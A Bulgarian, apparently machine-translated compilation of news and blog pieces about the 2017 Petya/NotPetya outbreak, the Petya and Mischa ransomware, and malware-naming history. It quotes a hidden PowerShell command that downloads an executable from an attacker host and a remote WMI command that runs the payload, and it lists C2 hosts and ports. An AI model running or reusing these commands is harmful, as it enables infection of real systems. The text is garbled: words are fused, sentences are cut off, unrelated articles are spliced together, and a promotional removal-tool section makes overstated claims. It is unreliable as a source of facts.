В интернет има нова вирусна епидемия от рансъмуер. Зловреден софтуер на практика блокира работата на десетки големи компании, изискващи декриптиране твърд дисквсеки работна станциямалко под $400.

Паниката, генерирана от новата епидемия, създаде информационен хаос: първо антивирусните анализатори обявиха второто пришествие на WannaCry, след което зловредният софтуер беше идентифициран като комплекс от новосглобени криптиращи вируси „Petya“ и „Misha“. включено в моментаясно е, че ако вирусът е базиран на Петя, той е силно модифициран.

Моделът на разпространение е донякъде подобен на WannaCry - използва се експлойт за уязвимостта MS17-010, която беше подобрена чрез социално инженерство, използвайки уязвимост в MS Word. Инфекцията възниква, след като потребител отвори прикачен файл към имейл или изтегли файл, който използва уязвимостта CVE-2017-0199, публикувана през април 2017 г. И разпространението до други компютри в мрежата вече е осигурено от цял ​​набор от техники:

• кражба на потребителски пароли или използване на активни сесии за достъп до други мрежови възли (използва се помощен код на Mimikatz).
• чрез уязвимост в SMB (CVE-2017-0144, MS17-010) - използвайки същия известен експлойт на EthernalBlue, който беше успешно използван в WannaCry.

Зловреден софтуер използва откраднати сметкида копира тялото му в споделянията на admin$ и да ги стартира с помощта на легалната помощна програма PsExec, която служи за дистанционно управлениекомпютър.

Разработчик известна програма Мимикац, потвърденоче неговият модифициран код се използва за извличане на пароли.

Кодът за използване на интерфейса WMI за стартиране на инсталацията също беше публикуван в блога на Microsoft.

Инфекцията чрез SMB вектора използва уязвимостта CVE-2017-0144, подобно на техниката, използвана в WannaCry.

Но моделът на криптиране се е променил значително в сравнение с WannaCry. Вирусът, прониквайки в компютъра, заразява MBR (master boot record) на системата и криптира първите няколко блока на твърдия диск, включително Master File Table, правейки цялата твърд дискпотребители, а не само отделни файлове, както обикновено правят ransomware вирусите.

Определено не си струва да плащате откуп на изнудвачи и не само по етични причини: вирусните анализатори стигнаха до извода, че дешифрирането на файлове след плащане на откуп по принцип е невъзможно. Тази функция просто не е включена в зловреден софтуер. Всъщност това не е епидемия от ransomware, а епидемия от wiper вирус, който унищожава данни.

Според съобщения в медиите в Русия от най-големите проблемисе сблъскаха в корпорацията Роснефт, основните уебсайтове на корпорацията и уебсайтът Башнефт бяха деактивирани за дълго време.

Масови инфекции са регистрирани във Франция, Испания, Русия и страните от ОНД. В Украйна десетки държавни и търговски организации са засегнати от вируса.

Кому е нужно?

Тъй като механизмът за възстановяване не е включен в кода, има три възможни мотивации за нападателите. Или искаха да прикрият целенасоченото унищожаване на нечии конкретни данни като масова епидемия, или искаха да направят пари, без първоначално да възнамеряват да възстановят каквото и да било. Най-малко вероятният вариант е кибер вандализъм. Вирусът е сериозен продукт и би било по-разумно да похарчите усилията си за създаването му върху нещо, което носи пари. Вандалите бяха често срещани през 90-те години на миналия век, когато беше модерно да се разбиват системи за слава, но сега са изключително редки.

В резултат на това основните бенефициенти от епидемиите от последните 2 месеца очевидно бяха групата The Shadow Brokers, която разпространи експлойта на EthernalBlue. Самите изнудвачи събраха сравнително малки суми пари, няколко порядъка по-малко от размера на щетите, причинени от епидемията. Епидемиите се превърнаха в отлична реклама за The Shadow Brokers, които твърдят, че са готови да продадат информация за други експлойти от архива на NSA. В крайна сметка, EthernalBlue е само един експлойт от десетките, откраднати от Тайните служби през август 2016 г.

Механизъм на атака

Нападателят може да изпрати файлове или връзки към тях (в началния етап на епидемията това бяха файловете Petya.apx, myguy.exe, myguy.xls, Order-[any date].doc), чрез които се прехвърля работна станция с Windows заразен. Например, при отваряне на файла Order-[any date].doc, сървърът 84.200.16.242 се свързва на порт 80 и xls се изтегля:

powershell.exe -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\10807.exe");" (PID: [идентификатор на процес], Допълнителен контекст: (System.Net.WebClient).DownloadFile("h11p://french-cooking.com/myguy.exe", "%APPDATA%\[произволно число].exe") ;)

След това зловредният софтуер се опитва да се свърже със сървъри 111.90.139.247:80 и COFFEINOFFICE.XYZ:80, които вероятно са командни и контролни сървъри.

Индикатори за компрометиране са наличието на файлове:

C:\Windows\perfc.dat
C:\myguy.xls.hta

След като бъде назначен на домакина, др Windows машинив мрежата и се разпространява чрез уязвимостите, описани в MS17-010 (същите, използвани от WannaCry) на портове tcp:135, tcp:139, tcp:445, tcp:1024-1035.

Разпределението може да стане и чрез изпълнение на командата:

Отдалечен WMI, „процес извикване създаване "C:\\Windows\\System32\\rundll32.exe \"C:\\Windows\\perfc.dat\" #1"

Диаграмата за разпространение на инфекцията е взета от blog.kryptoslogic.com

Как да избегнем инфекция?

french-cooking.com:80
84.200.16.242:80
111.90.139.247:80
COFFEINOFFICE.XYZ:80

Petya.apx, myguy.exe, myguy.xls, Поръчка-[всяка дата].doc

3. Инсталирайте пачове

4. Конфигурирайте IPS за блокиране на експлойти за MS17-010

5. За да защитите хостове, които все още не са били заразени, можете да създадете файл c:\windows\perfc без разширение. Такива възли не са заразени.

Преди няколко месеца ние и други специалисти по ИТ сигурност открихме нов злонамерен софтуер - Петя (Win32.Trojan-Ransom.Petya.A). В класическия смисъл това не беше криптатор; вирусът просто блокираше достъпа до определени типове файлове и изискваше откуп. Вирусът е модифициран запис за зарежданена твърдия диск, принудително рестартира компютъра и показва съобщение, че „данните са криптирани - губете парите си за декриптиране“. Всичко на всичко стандартна схема ransomware вируси, освен че файловете всъщност НЕ са криптирани. Повечето популярни антивируси започнаха да идентифицират и премахват Win32.Trojan-Ransom.Petya.A няколко седмици след появата му. Освен това има инструкции за ръчно премахване. Защо смятаме, че Petya не е класически ransomware? Този вирус прави промени в главния зареждащ запис и предотвратява зареждането на операционната система, а също така криптира основната файлова таблица. Той не криптира самите файлове.

Преди няколко седмици обаче се появи по-сложен вирус Миша, явно написани от същите измамници. Този вирус ШИФРОВА файлове и изисква да платите $500 - $875 за декриптиране (в различни версии 1,5 – 1,8 биткойни). Инструкциите за „декриптиране” и заплащането за това се съхраняват във файловете YOUR_FILES_ARE_ENCRYPTED.HTML и YOUR_FILES_ARE_ENCRYPTED.TXT.

Mischa virus – съдържанието на YOUR_FILES_ARE_ENCRYPTED.HTML файл

Сега всъщност хакерите заразяват компютрите на потребителите с два зловреден софтуер: Petya и Mischa. Първият се нуждае от администраторски права в системата. Тоест, ако потребител откаже да даде на Petya администраторски права или ръчно изтрие този зловреден софтуер, Mischa се намесва. Този вирус не изисква администраторски права, той е класически криптатор и всъщност криптира файлове с помощта на силния AES алгоритъм и без да прави никакви промени в главния зареждащ запис и файловата таблица на твърдия диск на жертвата.

Зловреден софтуер Mischa не само криптира стандартни видовефайлове (видео, снимки, презентации, документи), но също и .exe файлове. Вирусът не засяга само директориите \Windows, \$Recycle.Bin, \Microsoft, \ Mozilla Firefox,\Opera,\ Internet Explorer, \Temp, \Local, \LocalLow и \Chrome.

Заразяването става предимно чрез електронна поща, където се получава писмо с прикачен файл - инсталатора на вируса. Може да бъде криптиран под писмо от данъчната служба, от вашия счетоводител, като прикачени касови бележки и разписки за покупки и др. Обърнете внимание на файловите разширения в такива букви - ако това е изпълним файл (.exe), тогава с голяма вероятност това може да е контейнер с вируса Petya\Mischa. И ако модификацията на злонамерения софтуер е скорошна, вашата антивирусна програма може да не реагира.

Актуализация 30.06.2017 г.: 27 юни, модифицирана версия на вируса Petya (Петя.А)масово атакува потребители в Украйна. Ефектът от тази атака е огромен и икономическите щети все още не са изчислени. За един ден беше парализирана работата на десетки банки, търговски вериги, държавни агенции и предприятия от различни форми на собственост. Вирусът се разпространява главно чрез уязвимост в украинската система за счетоводни отчети MeDoc с най-новата автоматична актуализацияна този софтуер. Освен това вирусът е засегнал страни като Русия, Испания, Великобритания, Франция и Литва.

Премахнете вируса Petya и Mischa с помощта на автоматичен почистващ препарат

Изключително ефективен методработа със зловреден софтуер като цяло и по-специално с ransomware. Използването на доказан защитен комплекс гарантира задълбочено откриване на всякакви вирусни компоненти, техните пълно премахванес едно кликване. Моля, обърнете внимание ние говорим заза два различни процеса: деинсталиране на инфекцията и възстановяване на файлове на вашия компютър. Заплахата обаче със сигурност трябва да бъде премахната, тъй като има информация за въвеждането на други компютърни троянски коне, които я използват.

1. . След като стартирате софтуера, щракнете върху бутона Стартирайте компютърното сканиране(Стартирайте сканирането).
2. Инсталираният софтуер ще предостави отчет за заплахите, открити по време на сканирането. За да премахнете всички открити заплахи, изберете опцията Коригиране на заплахи(Елиминирайте заплахите). Въпросният зловреден софтуер ще бъде напълно премахнат.

Възстановете достъпа до криптирани файлове

Както беше отбелязано, рансъмуерът Mischa заключва файлове, използвайки силен алгоритъм за криптиране, така че криптираните данни да не могат да бъдат възстановени с махване с магическа пръчица – освен плащането на нечувана сума за откуп (понякога достигаща до $1000). Но някои методи наистина могат да бъдат спасител, който ще ви помогне да възстановите важни данни. По-долу можете да се запознаете с тях.

програма автоматично възстановяванефайлове (дешифратор)

Известно е едно много необичайно обстоятелство. Тази инфекция изтрива изходни файловев некриптиран вид. Следователно процесът на криптиране за целите на изнудването е насочен към техни копия. Това дава възможност за такива софтуеркак да възстановите изтрити обекти, дори ако надеждността на премахването им е гарантирана. Силно се препоръчва да се прибегне до процедурата за възстановяване на файлове, нейната ефективност е извън съмнение.

Сенчени копия на томове

Подходът се основава на процедурата на Windows архивиранефайлове, което се повтаря при всяка точка на възстановяване. Важно условиеработа този метод: Функцията „Възстановяване на системата“ трябва да бъде активирана преди заразяване. Въпреки това, всички промени във файла, направени след точката за възстановяване, няма да се появят във възстановената версия на файла.

Архивиране

Това е най-добрият сред всички методи без откуп. Ако процедурата за архивиране на данни на външен сървър е била използвана преди атаката на ransomware на вашия компютър, за да възстановите криптирани файлове, просто трябва да влезете в съответния интерфейс, да изберете необходимите файлове и да стартирате механизма за възстановяване на данни от архива. Преди да извършите операцията, трябва да се уверите, че рансъмуерът е напълно премахнат.

Проверка за евентуално наличие на остатъчни компоненти от рансъмуера Petya и Mischa

Почистване в ръчен режиме изпълнен с пропускане на отделни фрагменти от ransomware, които могат да избегнат премахването под формата на скрити обекти на операционната система или елементи на регистъра. За да елиминирате риска от частично задържане на отделни злонамерени елементи, сканирайте компютъра си с надежден защитен софтуер. софтуерен пакет, специализирана в зловреден софтуер.

Кратка екскурзия в историята на именуването зловреден софтуер.

Отметки

Лого на вируса Petya.A

На 27 юни най-малко 80 руски и украински компании бяха атакувани от вируса Petya.A. Програмата блокира информацията на компютрите на отдели и предприятия и, подобно на добре познатия ransomware вирус, изисква биткойни от потребителите.

Злонамерените програми обикновено се назовават от служители на компании за разработка на антивирусни програми. Изключение правят тези криптори, ransomware, унищожители и крадци на самоличност, които освен компютърни инфекции причиняват медийни епидемии - повишен шум в медиите и активни дискусии в мрежата.

Вирусът Petya.A обаче е представител на ново поколение. Името, с което се представя е част маркетингова стратегияразработчици, насочени към увеличаване на неговото разпознаване и нарастваща популярност на пазара на даркнет.

Субкултурен феномен

В онези дни, когато имаше малко компютри и не всички от тях бяха свързани помежду си, вече съществуваха саморазпространяващи се програми (все още не вируси). Един от първите от тях беше , който шеговито поздрави потребителя и предложи да го хване и изтрие. Следващият беше Cookie Monster, който поиска да му „дадете бисквитка“, като въведете думата „бисквитка“.

Ранният злонамерен софтуер също имаше чувство за хумор, въпреки че не винаги беше в имената им. Така Ричард Скрант, предназначен за компютъра Apple-2, чете стихотворение на жертвата веднъж на всеки 50 стартирания на компютъра, а имената на вирусите, често скрити в кода и не се показват, се отнасят до шеги и субкултурни думи, често срещани сред маниаците от онова време. Те могат да бъдат свързани с имена на метъл групи, популярна литература и настолни ролеви игри.

В края на 20-ти век създателите на вируси не се криеха много - нещо повече, често, когато дадена програма излезе извън контрол, те се опитваха да участват в премахването на нанесената й вреда. Такъв беше случаят с пакистанския и разрушителен, създаден от бъдещия съосновател на бизнес инкубатора Y-Combinator.

Един от руските вируси, споменат от Евгений Касперски в книгата му от 1992 г. „Компютърни вируси в MS-DOS“, също демонстрира поетични способности. Програмата Condom-1581 от време на време показваше на жертвата програма, посветена на проблемите със запушването на световните океани с човешки отпадъци.

География и календар

През 1987 г. Йерусалимският вирус, известен също като Израелския вирус, е кръстен на мястото, където е открит за първи път, и неговата алтернативно имеЧерният петък се дължи на факта, че ще активира и изтрива изпълними файлове, ако 13-то число на месеца се пада в петък.

Вирусът Микеланджело, който предизвика паника в медиите през пролетта на 1992 г., също е кръстен на календарния принцип. Тогава Джон Макафи, по-късно известен със създаването на една от най-натрапчивите антивируси, по време на конференция за киберсигурност в Сидни, каза на журналисти и обществеността: „Ако стартирате заразена система на 6 март, всички данни на твърдия диск ще бъдат повредени.“ Какво общо има Микеланджело с това? 6 март беше рожденият ден на италианския художник. Въпреки това, ужасите, които McAfee предсказа, в крайна сметка се оказаха силно преувеличени.

Функционалност

Възможностите на вируса и неговата специфика често служат като основа за името. През 1990 г. един от първите полиморфни вируси е наречен Chameleon, а той, който има широки възможности да прикрива присъствието си (и следователно принадлежи към категорията на стелт вирусите), е наречен Frodo, намеквайки за героя от „Властелинът на Пръстени” и Пръстенът, скрит от очите на другите. И например вирусът OneHalf от 1994 г. получи името си поради факта, че прояви агресия само като зарази половината от диска на атакуваното устройство.

Сервизни заглавия

Повечето вируси отдавна са именувани в лаборатории, където се анализират на части от анализатори.

Обикновено това са скучни серийни имена и общи „фамилни“ имена, които описват категорията на вируса, какви системи атакува и какво прави с тях (като Win32.HLLP.DeTroie). Понякога обаче, когато в програмния код се разкрият намеци, оставени от разработчиците, вирусите придобиват малко индивидуалност. Така се появиха например вирусите MyDoom и KooKoo.

Това правило обаче не винаги работи - например вирусът Stuxnet, който спря центрофугите за обогатяване на уран в Иран, не беше наречен Myrtus, въпреки че тази дума („мирта“) в кода беше почти пряк намек за участието на израелски разузнавателните служби в неговото развитие. В този случай победи името, което вече беше известно на широката общественост, присвоено на вируса в първите етапи от откриването му.

Задачи

Често се случва вируси, които изискват много внимание и усилия за изследване, да получават красиви имена от антивирусни компании, които са по-лесни за изговаряне и записване - това се случи с Червения октомври, дипломатическа кореспонденция и данни, които биха могли да повлияят на международните отношения, както и с IceFog, широкомащабен индустриален шпионаж.

Разширение на файла

Друг популярен начин за именуване е чрез разширението, което вирусът присвоява на заразените файлове. Така един от „военните“ вируси, Duqu, е кръстен така не заради граф Дуку от „Междузвездни войни“, а заради префикса ~DQ, който обозначава създадените от него файлове.

Така сензационният получи името си тази пролет. WannaCry вирус, който маркира данните, които криптира с разширението .wncry.

По-ранно име Искам вирус Decrypt0r, не се хвана - звучеше по-зле и имаше различен правопис. Не всички си направиха труда да сложат "0" като "о".

„Вие станахте жертва на рансъмуер вируса Petya“

Точно така се представя най-обсъжданият злонамерен софтуер днес, след като завърши криптирането на файлове на атакувания компютър. Вирусът Petya A. има не само разпознаваемо име, но и лого под формата на пиратски череп и кръстосани кости, както и цяла маркетингова промоция. Забелязан заедно със своя брат „Миша“, вирусът привлече вниманието на анализаторите именно поради това.

От субкултурен феномен, преминали през период, когато този вид „хакване“ изискваше доста сериозни технически познания, вирусите се превърнаха в оръжие на кибер-гоп-стопа. Сега те трябва да играят по правилата на пазара - и който получава повече внимание, носи големи печалби на своите разработчици.

Във вторник, 27 юни, украински и руски компаниисъобщи за масивна вирусна атака: компютрите в предприятията показват съобщение за откуп. Разбрах кой отново пострада от хакери и как да се предпазите от кражба на важни данни.

Петя, стига толкова

Енергийният сектор беше първи атакуван: украинските компании Ukrenergo и Kyivenergo се оплакаха от вируса. Нападателите ги парализираха компютърни системи, но това не се отрази на стабилността на електроцентралите.

Украинците започнаха да публикуват онлайн последствията от заразата: съдейки по многобройни снимки, компютрите са били атакувани от вирус ransomware. На екрана на засегнатите устройства се появи съобщение, че всички данни са криптирани и собствениците на устройства трябва да платят откуп от $300 в биткойни. Хакерите обаче не казаха какво ще се случи с информацията в случай на бездействие и дори не поставиха таймер за обратно отброяване, докато данните бъдат унищожени, какъвто беше случаят с вирусната атака WannaCry.

Националната банка на Украйна (НБУ) съобщи, че работата на няколко банки е била частично парализирана поради вируса. Според украинските медии атаката е засегнала офисите на Oschadbank, Ukrsotsbank, Ukrgasbank и PrivatBank.

бяха заразени компютърни мрежи"Укртелеком", летище "Бориспол", "Укрпоща", " Нова поща“, „Киевводоканал“ и Киевското метро. Освен това вирусът удари украинските мобилни оператори - Kyivstar, Vodafone и Lifecell.

По-късно украинските медии уточниха, че става дума за зловреден софтуер Petya.A. Разпространява се по обичайната за хакерите схема: на жертвите се изпращат фишинг имейли от манекени с молба да отворят прикачен линк. След това вирусът прониква в компютъра, криптира файловете и иска откуп за дешифрирането им.

Хакерите посочиха номера на техния биткойн портфейл, към който трябва да бъдат преведени парите. Съдейки по информацията за транзакцията, жертвите вече са прехвърлили 1,2 биткойна (повече от 168 хиляди рубли).

Според експерти по информационна сигурностот компанията Group-IB, в резултат на атаката са засегнати над 80 компании. Ръководителят на тяхната криминална лаборатория отбеляза, че вирусът не е свързан с WannaCry. За да реши проблема, той посъветва затваряне на TCP портове 1024–1035, 135 и 445.

Кой е виновен

Тя побърза да предположи, че атаката е организирана от територията на Русия или Донбас, но не предостави никакви доказателства. министър на инфраструктурата на Украйна видяхулика в думата „вирус“ и написа в своя Facebook, че „не е случайно, че завършва на RUS“, добавяйки намигащ емотикон към предположението си.

Междувременно той твърди, че атаката по никакъв начин не е свързана със съществуващ „зловреден софтуер“, известен като Petya и Mischa. Експертите по сигурността твърдят, че новата вълна е засегнала не само украински и руски компании, но и предприятия в други страни.

Сегашният „злонамерен софтуер“ обаче прилича на добре познатия вирус Petya по своя интерфейс, който беше разпространен чрез фишинг връзки преди няколко години. В края на декември неизвестен хакер, отговорен за създаването на рансъмуера Petya and Mischa, започна да изпраща заразени имейли с прикачен вирус, наречен GoldenEye, който беше идентичен с предишните версии на рансъмуера.

Приложението към редовното писмо, което служителите на отдела по човешки ресурси често получаваха, съдържаше информация за фалшивия кандидат. В един от файловете всъщност може да се намери резюме, а в следващия - инсталаторът на вируса. Тогава основните мишени на нападателя са били фирми в Германия. За 24 часа в капана са попаднали над 160 служители на германската компания.

Не беше възможно да се идентифицира хакерът, но е очевидно, че той е фен на Бонд. Програмите Петя и Миша са имената на руските сателити „Петя” и „Миша” от филма „Златното око”, които в сюжета са били електромагнитни оръжия.

Оригиналната версия на Petya започна активно да се разпространява през април 2016 г. Тя умело се маскира на компютри и се преструва на такава правни програмиподкана за разширени администраторски права. След активирането програмата се държеше изключително агресивно: тя постави строг срок за плащане на откупа, изисквайки 1,3 биткойна, а след крайния срок удвои паричната компенсация.

Вярно, тогава един от потребителите на Twitter бързо го намери слабости ransomware и създаден проста програма, който за седем секунди генерира ключ, който ви позволява да отключите компютъра и да дешифрирате всички данни без никакви последствия.

Не за първи път

В средата на май компютри по света бяха атакувани от подобен рансъмуер вирус WannaCrypt0r 2.0, известен още като WannaCry. Само за няколко часа той парализира работата на стотици хиляди работници Windows устройствав повече от 70 държави. Сред жертвите са руските сили за сигурност, банки и мобилни оператори. Веднъж попаднал на компютъра на жертвата, вирусът криптира твърдия диск и изисква от нападателите да изпратят 300 долара в биткойни. Бяха дадени три дни за размисъл, след което сумата беше удвоена и след седмица файловете бяха криптирани завинаги.

Жертвите обаче не бързаха да платят откупа и създателите на зловреден софтуер

Авторско право на илюстрация PAНадпис на изображението Според експертите борбата с новия ransomware е по-трудна от WannaCry

На 27 юни ransomware заключи компютри и криптира файлове в десетки компании по света.

Съобщава се, че украинските компании са пострадали най-много - вирусът е заразил компютрите на големи компании, държавни агенции и инфраструктурни съоръжения.

Вирусът изисква $300 в биткойни от жертвите, за да дешифрира файлове.

Руската служба на BBC отговаря на основните въпроси за новата заплаха.

Кой пострада?

Разпространението на вируса започна в Украйна. Засегнати са летище Бориспол, някои регионални поделения на Ukrenergo, вериги магазини, банки, медии и телекомуникационни компании. Компютрите в украинското правителство също паднаха.

След това дойде ред на компании в Русия: Роснефт, Башнефт, Mondelez International, Mars, Nivea и други също станаха жертви на вируса.

Как действа вирусът?

Експертите все още не са стигнали до консенсус относно произхода на новия вирус. Group-IB и Positive Technologies го разглеждат като вариант на вируса Petya от 2016 г.

„Това е изнудване софтуеризползва както методи за хакване, така и помощни програми, и стандартни помощни програмисистемна администрация“, коментира Елмар Набигаев, ръководител на отдела за реакция на заплахи за информационната сигурност в Positive Technologies. - Всичко това гарантира висока скоростразпространението в рамките на мрежата и масовостта на епидемията като цяло (ако поне една персонален компютър). Резултатът е пълна неработоспособност на компютъра и криптиране на данните."

Румънската компания Bitdefender вижда повече общо с вируса GoldenEye, в който Petya е комбиниран с друг зловреден софтуер, наречен Misha. Предимството на последния е, че не изисква администраторски права от бъдещата жертва за криптиране на файлове, а ги извлича самостоятелно.

Брайън Кембълот Fujitsu и редица други експерти смятат, че нов вирусизползва модифицирана програма EternalBlue, открадната от Агенцията за национална сигурност на САЩ.

След публикуването на тази програма от хакерите The Shadow Brokers през април 2017 г., създаденият на нейна база ransomware вирус WannaCry се разпространи по целия свят.

Използвайки уязвимостите на Windows, тази програма позволява на вируса да се разпространи в компютрите навсякъде корпоративна мрежа. Оригиналът на Петя беше изпратен чрез имейлмаскиран като автобиография и може да зарази само компютъра, където е отворена автобиографията.

От Kaspersky Lab казаха на Интерфакс, че вирусът рансъмуер не принадлежи към известните досега семейства злонамерен софтуер.

„Софтуерните продукти на Kaspersky Lab откриват този зловреден софтуер като UDS:DangeroundObject.Multi.Generic“, отбеляза Вячеслав Закоржевски, ръководител на отдела за антивирусни изследвания в Kaspersky Lab.

Като цяло, ако наричате новия вирус с руското му име, трябва да имате предвид, че на външен вид той прилича повече на чудовището на Франкенщайн, тъй като е сглобен от няколко злонамерени програми. Със сигурност се знае, че вирусът се е родил на 18 юни 2017 г.

Надпис на изображението Вирусът изисква $300, за да дешифрира файлове и да отключи компютъра ви.

По-готин от WannaCry?

На WannaCry бяха нужни само няколко дни през май 2017 г., за да се превърне в най-голямата кибератака от този вид в историята. Ще надмине ли новият рансъмуер вирус своя скорошен предшественик?

За по-малко от ден нападателите са получили от жертвите си 2,1 биткойна - около 5 хиляди долара. WannaCry събра 7 биткойна през същия период.

В същото време, според Елмар Набигаев от Positive Technologies, е по-трудно да се борим с новия ransomware.

„В допълнение към експлоатирането на [уязвимостта на Windows], тази заплаха се разпространява и чрез акаунти операционни системи, откраднати с помощта на специални хакерски инструменти“, отбеляза експертът.

Как да се борим с вируса?

Като превантивна мярка експертите съветват да инсталирате навреме актуализации за операционните системи и да проверявате файловете, получени по имейл.

На напредналите администратори се препоръчва временно да деактивират мрежовия протокол за прехвърляне на сървърни съобщения (SMB).

Ако вашите компютри са заразени, при никакви обстоятелства не трябва да плащате на нападателите. Няма гаранция, че след като получат плащане, те ще дешифрират файловете, вместо да изискват повече.

Остава само да изчакаме програмата за дешифриране: в случая с WannaCry, Adrien Guinier, специалист от френската компания Quarkslab, отне седмица, за да я създаде.

Първият ransomware срещу СПИН (PC Cyborg) е написан от биолога Джоузеф Поп през 1989 г. Тя скри директории и криптирани файлове, като поиска плащане от $189 за" подновяване на лиценза" към сметка в Панама. Поп разпространява въображението си с помощта на флопи дискове по обикновена поща, което прави общо около 20 хилядияхпратки. Поп е задържан, докато се опитва да осребри чек, но избягва съдебен процес - през 1991 г. е обявен за луд.